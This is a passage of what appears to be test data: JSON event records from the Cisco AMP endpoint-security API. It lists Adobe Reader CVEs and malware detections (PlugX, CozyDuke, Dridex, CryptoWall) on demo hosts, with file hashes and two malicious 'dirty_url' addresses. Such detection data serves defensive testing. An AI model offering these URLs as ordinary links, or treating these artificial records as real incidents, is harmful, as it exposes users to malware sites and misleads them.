Reader","version":"9.3.3.177","cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"name":"Adobe Acrobat 
Reader","version":"9.3.3.177","cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906243727720000,"timestamp":1610704934,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:02:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906243727720449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825615424644973000,"timestamp":1610704922,"timestamp_nanoseconds":703000000,"date":"2021-01-15T10:02:02+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112390223000800,"timestamp":1610704898,"timestamp_nanoseconds":965000000,"date":"2021-01-15T10:01:38+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704898,"start_date":"2021-01-15T10:01:38+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Accessed URL matches characteristics of several malware 
families.","short_description":"GateDotPhp.ioc"},"network_info":{"dirty_url":"http://flashtamp.info/datas/gate.php","parent":{"disposition":"Clean","identity":{"sha256":"72c027273297ccf2f33f5b4c5f5bce3eecc69e5f78b6bbc1dec9e58780a6fd02"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112389350000600,"timestamp":1610704885,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:01:25+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704885,"start_date":"2021-01-15T10:01:25+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Svchost.exe accessed a Wordpress URL - this is anomalous and indicative of a process injection.","short_description":"W32.SvchostHitWordpressURL.ioc"},"network_info":{"dirty_url":"http://laptopsinhvien.net/wp-content/plugins/better-wp-security/modules/free/brute-force/js/ap3.php?t=i3fktdvzoauf","parent":{"disposition":"Clean","identity":{"sha256":"cb2bc00985f641f9900aa0adc5fc203eaaf57394412dc4ce4b37222ef519205f"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208098324251000,"timestamp":1610704881,"timestamp_nanoseconds":90000000,"date":"2021-01-15T10:01:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208098324250639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292803669262360","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292803669262359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"amdhcp32.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\amdhcp32.dll","identity":{"sha256":"37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7","sha1":"00f67deb6e435c68f8a39336c9effc45d395b134","md5":"6761106f816313394a653db5172dc487"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":33000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292803669262356","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"aticaldd.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\aticaldd.dll","identity":{"sha256":"0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca","sha1":"42cfe068b0f476198b93393840d400424fd77f0c","md5":"d596827d48a3ff836545b3a999f2c3e3"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":27000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262358","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262357","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295059","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"atiumdag.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\atiumdag.dll","identity":{"sha256":"8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154","sha1":"883292f00e5836f99a1943a6e0164d8c6c124478","md5":"bc626c8f11ed753f33ad1c0fe848d898"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292799374295058","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292799374295057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":917000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295055","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295054","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":776000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295052","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":762000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295051","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":757000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat 
